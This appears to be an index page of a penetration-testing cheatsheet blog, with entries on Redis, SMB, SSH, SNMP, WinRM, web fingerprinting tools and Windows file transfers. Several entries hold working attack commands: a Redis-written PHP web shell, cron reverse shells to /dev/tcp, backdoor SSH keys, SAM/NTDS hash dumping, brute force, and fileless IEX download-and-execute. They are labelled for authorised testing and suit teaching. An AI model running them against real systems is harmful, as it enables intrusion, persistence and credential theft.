ReconSpider

ReconSpider Cheatsheet Type: Custom Scrapy-based web crawler that maps a target site and harvests links, emails, subdomains, external hosts, images, files, and metadata into a single JSON report Installation # Download the spider (HTB Academy distribution) wget -O ReconSpider.zip \ https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.06.zip unzip ReconSpider.zip # Requires Scrapy (and Python 3) pip3 install scrapy ReconSpider is a single Python script (ReconSpider.py) built on top of [[scrapy]]. There is no system package — it runs directly with python3. ...

3 min · d3vilsec

Redis

Redis Enumeration Cheatsheet Default Port: 6379 (TCP) — often unauthenticated and bound to all interfaces Initial Scanning nmap -p 6379 -sV <ip> nmap -p 6379 --script redis-info <ip> # Server info / config nmap -p 6379 --script redis-* <ip> # All Redis scripts Connecting # Install client sudo apt install redis-tools # Connect (no auth) redis-cli -h <ip> redis-cli -h <ip> -p 6379 # Authenticated redis-cli -h <ip> -a <password> redis-cli -h <ip> -a <password> --no-auth-warning # One-off command without interactive shell redis-cli -h <ip> INFO # Raw connection (no client installed) nc <ip> 6379 # then type: INFO (end with CRLF) Basic Enumeration # Inside redis-cli (or: redis-cli -h <ip> <command>) INFO # Full server info (version, OS, role, etc.) INFO server # Just server section INFO keyspace # Databases in use and key counts CONFIG GET * # Dump all config values CONFIG GET dir # Working directory (useful for writes) CONFIG GET dbfilename # RDB filename CLIENT LIST # Connected clients COMMAND COUNT # Number of available commands ACL WHOAMI # Current user (Redis 6+) ACL LIST # Access control rules (Redis 6+) Exploring Data SELECT <n> # Switch DB index (default 0) DBSIZE # Number of keys in current DB KEYS * # List ALL keys (heavy on large DBs) SCAN 0 # Cursor-based key iteration (safer) RANDOMKEY # Return a random key # Inspect a key TYPE <key> # Data type (string, list, set, hash, zset) TTL <key> # Time to live # Read by type GET <key> # string LRANGE <key> 0 -1 # list SMEMBERS <key> # set HGETALL <key> # hash ZRANGE <key> 0 -1 # sorted set # Dump everything quickly redis-cli -h <ip> --scan | while read k; do echo "$k => $(redis-cli -h <ip> GET "$k")"; done Authentication Notes # Check if auth is required redis-cli -h <ip> PING # -> PONG = no auth (open!) # -> NOAUTH ... = password required # Brute force with nmap nmap -p 6379 --script redis-brute <ip> # Brute force with hydra hydra -P /usr/share/wordlists/rockyou.txt redis://<ip> RCE / Post-Exploitation (Authorised testing only) # 1. Web shell via RDB write (if web root is writable & known) redis-cli -h <ip> CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php SET test "<?php system($_GET['cmd']); ?>" SAVE # -> browse to http://<ip>/shell.php?cmd=id # 2. SSH key injection (if redis runs as a user with ~/.ssh writable) (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt redis-cli -h <ip> -x SET sshkey < key.txt redis-cli -h <ip> CONFIG SET dir /root/.ssh CONFIG SET dbfilename authorized_keys SET sshkey "..." SAVE # -> ssh -i id_rsa root@<ip> # 3. Cron job injection (write to /var/spool/cron) CONFIG SET dir /var/spool/cron/crontabs CONFIG SET dbfilename root SET shell "\n\n* * * * * bash -i >& /dev/tcp/<lhost>/<lport> 0>&1\n\n" SAVE Module loading (Redis 4.x/5.x): MODULE LOAD <path> can load a malicious .so for RCE (e.g. RedisModules-ExecuteCommand / exp.so). Newer versions restrict this. ...

4 min · d3vilsec

Rsync

Rsync Enumeration Cheatsheet Default Port: 873 (TCP) Detection nmap -p 873 <ip> nmap -p 873 -sV <ip> nmap -p 873 --script rsync-list-modules <ip> nc -nv <ip> 873 List Available Modules (Shares) # List modules (no auth) rsync -av --list-only rsync://<ip>/ rsync rsync://<ip>/ # nc banner grab nc -nv <ip> 873 # Then type: #list Enumerate Files in a Module rsync -av --list-only rsync://<ip>/<module>/ rsync -av --list-only rsync://<ip>/<module>/subdir/ # Recursive listing of entire module rsync -r --list-only rsync://<ip>/<module>/ Download Files # Download single file rsync rsync://<ip>/<module>/file.txt ./ # Download entire module rsync -av rsync://<ip>/<module>/ ./local_copy/ # With credentials rsync -av rsync://<user>@<ip>/<module>/ ./ rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./ # Dry run (see what would be downloaded) rsync -av --dry-run rsync://<ip>/<module>/ ./ Upload Files # Upload single file rsync -av ./shell.php rsync://<user>@<ip>/<module>/ # Upload directory rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/ # With password file rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/ High-Value Paths to Check rsync -av --list-only rsync://<ip>/home/ rsync -av --list-only rsync://<ip>/root/ rsync -av --list-only rsync://<ip>/etc/ rsync -av --list-only rsync://<ip>/backup/ rsync -av --list-only rsync://<ip>/var/www/ rsync -av --list-only rsync://<ip>/.ssh/ SSH Key Theft & Planting # Download .ssh directory rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/ # Plant authorized_keys (if write access) rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys Nmap Scripts nmap -p 873 --script rsync-list-modules <ip>

1 min · d3vilsec

Scrapy

Scrapy Cheatsheet Type: Fast, high-level web crawling and scraping framework for Python — used to build custom spiders that extract links, emails, subdomains, and other data from target sites Installation # Via pip (recommended) pip3 install scrapy # Via apt sudo apt install python3-scrapy # Via conda conda install -c conda-forge scrapy # Verify scrapy version Basic Usage # Quick one-off crawl from the shell (no project needed) scrapy shell <url> scrapy shell https://example.com # Fetch a single page and dump to stdout scrapy fetch https://example.com # View the page as Scrapy sees it (opens in browser) scrapy view https://example.com # Run a standalone spider file scrapy runspider myspider.py Command-Line Tools Command Description scrapy startproject <name> Create a new project skeleton scrapy genspider <name> <domain> Generate a new spider from template scrapy crawl <spider> Run a spider inside a project scrapy runspider <file.py> Run a self-contained spider file scrapy shell <url> Interactive scraping shell (test selectors) scrapy fetch <url> Download a page using Scrapy’s downloader scrapy view <url> Open the fetched page in a browser scrapy parse <url> --spider=<name> Parse a URL with a spider’s callback scrapy list List available spiders in the project scrapy settings --get <KEY> Print a settings value scrapy bench Run a quick benchmark crawl Common crawl Flags Flag Description -o <file> Output scraped items to file (.json, .jsonl, .csv, .xml) -O <file> Same as -o but overwrites instead of appending -a <name>=<value> Pass an argument to the spider (e.g. -a domain=example.com) -s <KEY>=<value> Override a setting at runtime -L <level> Log level (DEBUG, INFO, WARNING, ERROR) --logfile <file> Write logs to a file --nolog Disable logging -t <format> Output format when not inferred from extension Common Commands # Create a project scrapy startproject recon # Generate a spider scoped to a domain cd recon scrapy genspider links example.com # Run the spider and export results scrapy crawl links -o results.json # Run a standalone spider with output scrapy runspider spider.py -o output.jsonl # Pass arguments into a spider scrapy crawl links -a domain=example.com -a depth=2 # Override settings on the fly (respect robots.txt off, set delay) scrapy crawl links -s ROBOTSTXT_OBEY=False -s DOWNLOAD_DELAY=1 # Limit log noise scrapy crawl links -L WARNING -o out.csv # Test CSS / XPath selectors interactively scrapy shell "https://example.com" Inside the Scrapy Shell # After: scrapy shell "https://example.com" response.url # Current URL response.status # HTTP status code response.headers # Response headers # CSS selectors response.css('a::attr(href)').getall() # All link hrefs response.css('title::text').get() # Page title # XPath selectors response.xpath('//a/@href').getall() # All link hrefs response.xpath('//img/@src').getall() # All image sources # Follow a link fetch('https://example.com/about') # Regex over the body (e.g. emails) import re re.findall(r'[\w.+-]+@[\w-]+\.[\w.-]+', response.text) Minimal Recon Spider # save as spider.py, run with: scrapy runspider spider.py -o out.json import scrapy from urllib.parse import urlparse class ReconSpider(scrapy.Spider): name = "recon" start_urls = ["https://example.com"] def parse(self, response): # Collect all links and follow same-domain ones for href in response.css('a::attr(href)').getall(): yield {"link": response.urljoin(href)} if urlparse(response.urljoin(href)).netloc == urlparse(response.url).netloc: yield response.follow(href, callback=self.parse) Useful Settings (settings.py / -s overrides) Setting Description ROBOTSTXT_OBEY Whether to honour robots.txt (default True) DOWNLOAD_DELAY Seconds between requests (politeness / rate limiting) CONCURRENT_REQUESTS Max simultaneous requests DEPTH_LIMIT Max crawl depth (0 = unlimited) USER_AGENT Custom User-Agent string RETRY_TIMES Number of retries on failed requests HTTPCACHE_ENABLED Cache responses locally to avoid re-fetching AUTOTHROTTLE_ENABLED Auto-adjust delay based on server load # Example: stealthier crawl scrapy crawl recon \ -s DOWNLOAD_DELAY=2 \ -s CONCURRENT_REQUESTS=2 \ -s AUTOTHROTTLE_ENABLED=True \ -s USER_AGENT="Mozilla/5.0" Notes Active — Scrapy makes real HTTP requests to the target; only crawl in-scope assets. Set ROBOTSTXT_OBEY=False only when authorised; by default Scrapy respects robots.txt. Use DOWNLOAD_DELAY / AUTOTHROTTLE to avoid hammering targets and tripping WAFs. Great base for custom recon crawlers — [[reconspider]] is a Scrapy-based spider built exactly for this. Export to JSON/JSONL then post-process with jq to extract emails, subdomains, and links.

3 min · d3vilsec

Search Operators

Search Operators (Google Dorking) Cheatsheet Type: Passive reconnaissance using advanced search-engine operators to surface exposed files, directories, credentials, subdomains, and metadata without touching the target Core Operators Operator Description Example site: Restrict results to a domain site:example.com inurl: Term appears in the URL inurl:admin intitle: Term appears in the page title intitle:"index of" intext: Term appears in the body text intext:password filetype: / ext: Restrict to a file extension filetype:pdf cache: Show Google’s cached copy cache:example.com related: Find similar sites related:example.com link: Pages linking to a URL (deprecated/limited) link:example.com define: Dictionary definition define:reconnaissance AROUND(n) Terms within n words of each other admin AROUND(3) password Operator Modifiers Modifier Description Example "..." Exact phrase match "confidential" - Exclude a term site:example.com -www OR / | Logical OR site:example.com (filetype:pdf OR filetype:docx) AND Logical AND (implicit) intitle:login AND inurl:admin * Wildcard / placeholder "username * password" ( ) Group terms site:example.com (admin OR login) .. Number range "budget 2020..2024" “all” Variants Operator Description allintitle: All following words must be in the title allinurl: All following words must be in the URL allintext: All following words must be in the body allinanchor: All following words must be in anchor text Note: all* operators don’t mix well with other operators — use the single-term versions (intitle:, inurl:) when combining. ...

3 min · d3vilsec

SMB

SMB Enumeration Cheatsheet Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP) Initial Scanning nmap -p 139,445 -sV <ip> nmap -p 445 --script smb-os-discovery <ip> nmap -p 445 --script smb-security-mode <ip> nmap -p 445 --script smb2-security-mode <ip> nmap -p 139,445 --script smb-* <ip> # All SMB scripts nmap -p 445 --script smb-vuln-* <ip> # All vuln checks NetBIOS / NBT Scanning nbtscan <ip> nbtscan -r 192.168.1.0/24 nmblookup -A <ip> enum4linux / enum4linux-ng # Classic enum4linux -a <ip> # All checks enum4linux -u <user> -p <pass> <ip> # Authenticated enum4linux -S <ip> # Shares only enum4linux -U <ip> # Users only enum4linux -P <ip> # Password policy # Newer (recommended) enum4linux-ng -A <ip> enum4linux-ng -A <ip> -u <user> -p <pass> enum4linux-ng -A <ip> -oA output smbclient # List shares smbclient -L //<ip>/ -N # Null session smbclient -L //<ip>/ -U <user>%<pass> # Authenticated # Connect to share smbclient //<ip>/<share> -N smbclient //<ip>/<share> -U <user>%<pass> smbclient //<ip>/<share> -U <domain>/<user>%<pass> # Within smbclient shell ls # List files cd <dir> # Change directory get <file> # Download file put <file> # Upload file recurse ON # Enable recursive operations prompt OFF # Disable prompts mget * # Download everything mput * # Upload everything CrackMapExec (CME) # Basic info crackmapexec smb <ip> crackmapexec smb 192.168.1.0/24 # Authenticated enum crackmapexec smb <ip> -u <user> -p <pass> crackmapexec smb <ip> -u <user> -p <pass> --shares crackmapexec smb <ip> -u <user> -p <pass> --users crackmapexec smb <ip> -u <user> -p <pass> --groups crackmapexec smb <ip> -u <user> -p <pass> --sessions crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users crackmapexec smb <ip> -u <user> -p <pass> --local-groups # Credential spraying crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success # Pass-the-Hash crackmapexec smb <ip> -u <user> -H <nthash> # Command execution crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami' # CMD crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami' # PowerShell # Dump SAM/LSA crackmapexec smb <ip> -u <user> -p <pass> --sam crackmapexec smb <ip> -u <user> -p <pass> --lsa crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil # NTDS.dit impacket Tools python3 smbclient.py <domain>/<user>:<pass>@<ip> python3 samrdump.py <domain>/<user>:<pass>@<ip> python3 rpcdump.py <domain>/<user>:<pass>@<ip> python3 lookupsid.py <domain>/<user>:<pass>@<ip> python3 secretsdump.py <domain>/<user>:<pass>@<ip> # Dump all hashes python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip> Mounting SMB Shares # Linux mount sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass> sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain> Key Vulnerabilities CVE Name Description CVE-2017-0144 EternalBlue / MS17-010 SMBv1 RCE — WannaCry / NotPetya CVE-2020-0796 SMBGhost SMBv3.1.1 compression RCE CVE-2021-34527 PrintNightmare Print Spooler RCE via SMB # EternalBlue check nmap -p 445 --script smb-vuln-ms17-010 <ip> use auxiliary/scanner/smb/smb_ms17_010 # SMBGhost check nmap -p 445 --script smb-vuln-cve2020-0796 <ip> use auxiliary/scanner/smb/cve_2020_0796_smbghost

3 min · d3vilsec

SMTP

SMTP Enumeration Cheatsheet Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS) Banner Grabbing nc -nv <ip> 25 telnet <ip> 25 openssl s_client -starttls smtp -connect <ip>:587 openssl s_client -connect <ip>:465 Manual SMTP Commands HELO <domain> # Basic hello EHLO <domain> # Extended hello (lists capabilities) AUTH LOGIN # Start base64 auth AUTH PLAIN # Plain auth VRFY <user> # Verify if user exists EXPN <list> # Expand mailing list members RCPT TO:<user@domain> # Verify recipient (within MAIL flow) MAIL FROM:<[email protected]> RCPT TO:<target@domain> DATA # Begin message body . # End message (single dot on its own line) RSET # Reset connection state QUIT Capabilities Enumeration # See what the server supports after EHLO nc <ip> 25 EHLO test.com # Common capabilities to note: # STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN User Enumeration # smtp-user-enum tool smtp-user-enum -M VRFY -U users.txt -t <ip> smtp-user-enum -M EXPN -U users.txt -t <ip> smtp-user-enum -M RCPT -U users.txt -t <ip> -D <domain> # Manual VRFY loop for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 <ip> 25 2>/dev/null | grep "^250" done # Response codes: # 250 = user exists # 252 = can't verify but will attempt delivery # 550 = user does not exist Nmap Scripts nmap -p 25 --script smtp-commands <ip> nmap -p 25 --script smtp-enum-users <ip> nmap -p 25 --script smtp-open-relay <ip> nmap -p 25 --script smtp-brute <ip> nmap -p 25 --script smtp-ntlm-info <ip> # Windows NTLM info leak nmap -p 25 --script smtp-vuln-cve2010-4344 <ip> # Exim heap overflow nmap -p 25,587,465 --script smtp-* <ip> Open Relay Testing nc <ip> 25 EHLO test.com MAIL FROM:<[email protected]> RCPT TO:<[email protected]> # If accepted = open relay! DATA Subject: relay test This is a test. . QUIT # Automated nmap -p 25 --script smtp-open-relay \ --script-args [email protected],[email protected] <ip> Metasploit use auxiliary/scanner/smtp/smtp_version use auxiliary/scanner/smtp/smtp_enum use auxiliary/scanner/smtp/smtp_relay NTLM Info Leak (Windows SMTP) # Triggers Windows SMTP servers to reveal hostname, domain, OS version nmap -p 25 --script smtp-ntlm-info <ip> # Manual nc <ip> 25 EHLO test AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= # Decode the Base64 response with ntlmdecoder or responder Useful Wordlists /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

2 min · d3vilsec

SNMP

SNMP Enumeration Cheatsheet Default Ports: 161 (UDP — queries), 162 (UDP — traps) SNMP Versions Version Auth Notes v1 Community string Cleartext, oldest v2c Community string Cleartext, most common v3 Username + auth + encryption Secure, rarely misconfigured Detection nmap -sU -p 161 <ip> nmap -sU -p 161 -sV <ip> nmap -sU -p 161 --script snmp-info <ip> Community String Brute Force # onesixtyone (fast UDP brute) onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ip> onesixtyone -c community.txt -i ips.txt # Nmap nmap -sU -p 161 --script snmp-brute <ip> nmap -sU -p 161 --script snmp-brute \ --script-args snmp-brute.communitiesdb=communities.txt <ip> # Metasploit use auxiliary/scanner/snmp/snmp_login set RHOSTS <ip> run snmpwalk — Walking the MIB Tree # Full walk (v1/v2c) snmpwalk -v1 -c public <ip> snmpwalk -v2c -c public <ip> # Target specific OIDs snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.1 # System info snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.4.2 # Running processes snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.6.3 # Installed software snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpwalk -v2c -c public <ip> 1.3.6.1.4.1.77.1.2.25 # Windows user accounts snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.2.2 # Network interfaces # SNMPv3 snmpwalk -v3 -u <user> -l AuthPriv \ -a MD5 -A <authpass> -x DES -X <privpass> <ip> snmpget — Single OID Query snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.1.0 # sysDescr snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.5.0 # sysName (hostname) snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.6.0 # sysLocation snmp-check snmp-check <ip> snmp-check <ip> -c public snmp-check <ip> -c public -v 2c braa — Bulk SNMP braa public@<ip>:.1.3.6.* braa [email protected]:.1.3.6.1.2.1.1.1.0 Nmap SNMP Scripts nmap -sU -p 161 --script snmp-info <ip> nmap -sU -p 161 --script snmp-sysdescr <ip> nmap -sU -p 161 --script snmp-interfaces <ip> nmap -sU -p 161 --script snmp-processes <ip> nmap -sU -p 161 --script snmp-win32-users <ip> nmap -sU -p 161 --script snmp-win32-services <ip> nmap -sU -p 161 --script snmp-win32-software <ip> nmap -sU -p 161 --script snmp-* <ip> Key OIDs Reference OID Description 1.3.6.1.2.1.1.1.0 System description 1.3.6.1.2.1.1.3.0 System uptime 1.3.6.1.2.1.1.5.0 Hostname 1.3.6.1.2.1.1.6.0 System location 1.3.6.1.2.1.25.1.6.0 Running OS processes 1.3.6.1.2.1.25.4.2.1.2 Process names 1.3.6.1.2.1.25.6.3.1.2 Installed packages 1.3.6.1.4.1.77.1.2.25 Windows user accounts 1.3.6.1.2.1.6.13.1.3 TCP open ports 1.3.6.1.2.1.2.2.1.2 Interface names 1.3.6.1.2.1.2.2.1.11 Interface in-packets Common Community Strings public private manager community snmp cisco monitor 0 internal

2 min · d3vilsec

SSH

SSH Enumeration Cheatsheet Default Port: 22 (TCP) Banner & Info Gathering nc -nv <ip> 22 # Banner grab ssh -v <user>@<ip> # Verbose handshake output ssh -V # Local SSH client version # Nmap scripts nmap -p 22 -sV <ip> nmap -p 22 --script ssh-hostkey <ip> nmap -p 22 --script ssh2-enum-algos <ip> nmap -p 22 --script ssh-auth-methods \ --script-args ssh.user=<user> <ip> nmap -p 22 --script sshv1 <ip> # Check for insecure SSHv1 ssh-audit (Configuration Security Check) ssh-audit <ip> ssh-audit <ip> -p 22 # Flags to note: # [fail] = critical issue # [warn] = should be fixed # Lists: KEX, hostkey, encryption, MAC algorithms User Enumeration # CVE-2018-15473 (OpenSSH < 7.7 username enumeration) python3 ssh_user_enum.py --userList users.txt --ip <ip> # Metasploit use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS <ip> set USER_FILE users.txt run Brute Force # Hydra hydra -l <user> -P wordlist.txt ssh://<ip> hydra -L users.txt -P wordlist.txt ssh://<ip> hydra -l <user> -P wordlist.txt -s 2222 ssh://<ip> # Custom port # Medusa medusa -h <ip> -u <user> -P wordlist.txt -M ssh # Nmap nmap -p 22 --script ssh-brute <ip> nmap -p 22 --script ssh-brute \ --script-args userdb=users.txt,passdb=pass.txt <ip> # Metasploit use auxiliary/scanner/ssh/ssh_login set RHOSTS <ip> set USERNAME <user> set PASS_FILE wordlist.txt run Key-Based Attacks # Connect with private key ssh -i id_rsa <user>@<ip> chmod 600 id_rsa && ssh -i id_rsa <user>@<ip> # Crack passphrase on private key ssh2john id_rsa > ssh_hash.txt john ssh_hash.txt --wordlist=wordlist.txt hashcat -m 22921 ssh_hash.txt wordlist.txt # Ed25519 hashcat -m 22911 ssh_hash.txt wordlist.txt # RSA # Scan for keys (key harvesting after initial access) find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null find / -name "*.pem" -o -name "*.key" 2>/dev/null SSH Key Scanning # Collect host keys ssh-keyscan <ip> ssh-keyscan -t rsa,ecdsa,ed25519 <ip> ssh-keyscan -p 2222 <ip> # Scan range ssh-keyscan -f hosts.txt > known_hosts Interesting Files to Grab Post-Access ~/.ssh/id_rsa # Private key ~/.ssh/id_rsa.pub # Public key ~/.ssh/authorized_keys # Authorized keys (add yours for persistence) ~/.ssh/known_hosts # Previous connections (network map) /etc/ssh/sshd_config # Server configuration /etc/ssh/ssh_host_rsa_key # Host private key Add Backdoor SSH Key (Post-Exploitation) # On attacker machine ssh-keygen -t rsa -b 4096 -f backdoor # On target (append to authorized_keys) echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys # Connect back ssh -i backdoor <user>@<ip> Common Misconfigurations to Check PermitRootLogin yes — Root login allowed PasswordAuthentication yes — Passwords accepted (brutable) PermitEmptyPasswords yes — Blank passwords allowed AuthorizedKeysFile .ssh/authorized_keys — Key auth path AllowUsers / DenyUsers — User restrictions Port 22 — Non-standard port may indicate stealth

2 min · d3vilsec

wafw00f

wafw00f Cheatsheet Purpose: Identify and fingerprint Web Application Firewalls (WAFs) protecting a target web app. Basic Usage wafw00f <url> # Scan a single target wafw00f https://example.com # HTTPS target wafw00f example.com -v # Verbose output wafw00f example.com -vv # Extra verbose (debug) Common Flags Flag Description -v / -vv Verbose / very verbose output -a Find ALL WAFs (don’t stop at first match) -r Disable HTTP redirect following -t <waf> Test only for a specific WAF -o <file> Write results to file -f <format> Output format: csv, json, text -i <file> Read targets from input file -p <proxy> Use proxy (e.g. http://127.0.0.1:8080) -T <n> Set request timeout (seconds) -H <file> Use custom headers from file -l List all WAFs it can detect --no-colors Disable ANSI colored output Listing & Targeted Detection wafw00f -l # List supported WAFs wafw00f example.com -t "Cloudflare (Cloudflare Inc.)" wafw00f example.com -a # Detect every WAF in chain Bulk Scanning wafw00f -i targets.txt -o results.json -f json wafw00f -i urls.txt -a -o waf-report.csv -f csv Routing Through a Proxy (Burp / ZAP) wafw00f https://target.tld -p http://127.0.0.1:8080 Custom Headers File Example headers.txt: ...

2 min · d3vilsec

wappalyzer

Wappalyzer Cheatsheet Purpose: Identify web technologies — CMS, frameworks, JS libraries, analytics, ecommerce, CDNs — from response headers, HTML, cookies, scripts, and DOM. Note: Wappalyzer is primarily a browser extension and web service. The original CLI/NPM package was deprecated; community forks still exist. Access Points Surface URL / Source Browser extension (Chrome / Firefox / Edge) https://www.wappalyzer.com/apps/ Web lookup (single URL) https://www.wappalyzer.com/lookup/ API / bulk lookups (paid) https://www.wappalyzer.com/api/ Legacy NPM CLI (deprecated, archived) npm i -g wappalyzer Community fork (Webappalyzer) https://github.com/enthec/webappanalyzer Browser Extension Workflow Install extension; pin to toolbar. Navigate to target. Click the icon — categories light up: CMS, Web frameworks, JS libs, Analytics, Web servers, Tag managers, CDN, Ecommerce, Payment processors, Font scripts, Issue trackers, etc. Click a detected tech for vendor links and version info (when available). Stealth value: all detection runs in your browser against an already-loaded page → no extra requests to the target. ...

2 min · d3vilsec

whatweb

WhatWeb Cheatsheet Purpose: Identify web technologies — CMS, frameworks, web servers, JS libraries, analytics, version numbers — via signature plugins. Basic Usage whatweb <target> # Default scan whatweb https://target.tld whatweb -v https://target.tld # Verbose (full plugin output) whatweb -a 3 https://target.tld # Aggression level 3 whatweb target.tld --colour=never # No ANSI in output Common Flags Flag Description -v Verbose — full plugin details, not just summary -a <0-4> Aggression level (see below) -i <file> Read targets from file --input-file <file> Same as -i -U <ua> Custom User-Agent --header "K: V" Add custom header (repeatable) -c "<cookie>" Set Cookie header --user "<u:p>" HTTP Basic auth --proxy <host:port> Use proxy --proxy-user <u:p> Proxy auth --follow-redirect <mode> never, http-only, meta-only, same-site, always -t <n> Threads (default 25) --open-timeout <s> Connect timeout --read-timeout <s> Read timeout --log-brief <file> One-line summary log --log-verbose <file> Verbose log --log-xml <file> XML output --log-json <file> JSON output --log-magictree <file> MagicTree XML --log-sql <file> SQL insert statements -l List plugins -I <plugin> Show plugin info --plugins <list> Only run listed plugins (comma-separated) --no-errors Suppress connection errors Aggression Levels (-a) Level Name Behavior 1 Stealthy One GET per target, never follows redirects beyond that 2 (unused) Reserved 3 Aggressive Triggers extra requests when plugins want them (e.g. /wp-login.php) 4 Heavy Many requests per plugin; noisy, may set off WAF/IDS whatweb -a 1 target.tld # Single request, low noise whatweb -a 3 target.tld # Recommended for thorough enum whatweb -a 4 -v target.tld # Full noise, full detail Bulk / List Scanning whatweb -i targets.txt --log-brief whatweb.txt whatweb -i urls.txt -a 3 --log-json whatweb.json --no-errors cat ips.txt | whatweb --log-verbose verbose.log CIDR / range scan: ...

3 min · d3vilsec

Windows File Transfers

Windows File Transfer Cheatsheet Default Ports: SMB 445/tcp · HTTP 80/tcp · FTP 21/tcp · WinRM 5985/5986 “Download” = pulling a file onto the Windows target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only. PowerShell — Download # Download to disk Invoke-WebRequest -Uri http://10.10.14.5/file.exe -OutFile C:\Windows\Temp\file.exe iwr http://10.10.14.5/file.exe -OutFile file.exe # alias # Legacy / faster (no progress bar overhead) (New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\Temp\file.exe') # Fileless — execute in memory, nothing touches disk IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1') (New-Object Net.WebClient).DownloadString('http://10.10.14.5/s.ps1') | IEX iex (iwr http://10.10.14.5/s.ps1 -UseBasicParsing) If Invoke-WebRequest hangs, add -UseBasicParsing (no IE engine dependency). ...

4 min · d3vilsec

WinRM

WinRM Enumeration Cheatsheet Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS) What is WinRM? Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration. Detection nmap -p 5985,5986 <ip> nmap -p 5985,5986 -sV <ip> curl -s http://<ip>:5985/wsman curl -sk https://<ip>:5986/wsman Evil-WinRM # Password auth (HTTP) evil-winrm -i <ip> -u <user> -p <pass> # SSL (HTTPS, port 5986) evil-winrm -i <ip> -u <user> -p <pass> -S # Pass-the-Hash (NTLM) evil-winrm -i <ip> -u <user> -H <nthash> # With scripts and executables directory evil-winrm -i <ip> -u <user> -p <pass> \ -s /path/to/ps1_scripts/ \ -e /path/to/executables/ # Within evil-winrm shell menu # Show built-in commands upload /local/file.exe # Upload file download C: ile.txt # Download file Invoke-Binary /local/exe # Run local exe in memory bypass_uac # UAC bypass CrackMapExec # Test credentials crackmapexec winrm <ip> -u <user> -p <pass> crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass> # Credential spray crackmapexec winrm <ip> -u users.txt -p <pass> crackmapexec winrm <ip> -u <user> -p wordlist.txt # Pass-the-Hash crackmapexec winrm <ip> -u <user> -H <nthash> # Execute commands crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami' # CMD crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami' # PowerShell crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process' PowerShell / Windows Native # Test WinRM connectivity Test-WSMan -ComputerName <ip> Test-WSMan -ComputerName <ip> -UseSSL # Interactive remote session Enter-PSSession -ComputerName <ip> -Credential <user> Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user> # Non-interactive / scripted $cred = Get-Credential $sess = New-PSSession -ComputerName <ip> -Credential $cred Invoke-Command -Session $sess -ScriptBlock { whoami; hostname } Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig } # Copy files over WinRM Copy-Item -Path C:\local ile.exe -Destination C: emote\ -ToSession $sess Copy-Item -Path C: emote\loot.txt -Destination C:\local\ -FromSession $sess impacket # winrm_exec (alternative) python3 winrm_exec.py <domain>/<user>:<pass>@<ip> Brute Force crackmapexec winrm <ip> -u <user> -p wordlist.txt hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \ "/wsman:Username=^USER^&Password=^PASS^:401" Common Scenarios Pwned user is in group: "Remote Management Users" → Can use WinRM "Administrators" → Full access via WinRM Check group membership: net localgroup "Remote Management Users" Key Facts Requires user to be in Remote Management Users or Administrators group Can be enabled with: Enable-PSRemoting -Force Firewall rule: WinRM-HTTP-In-TCP (port 5985) Often enabled on Domain Controllers and management servers

2 min · d3vilsec

WMI

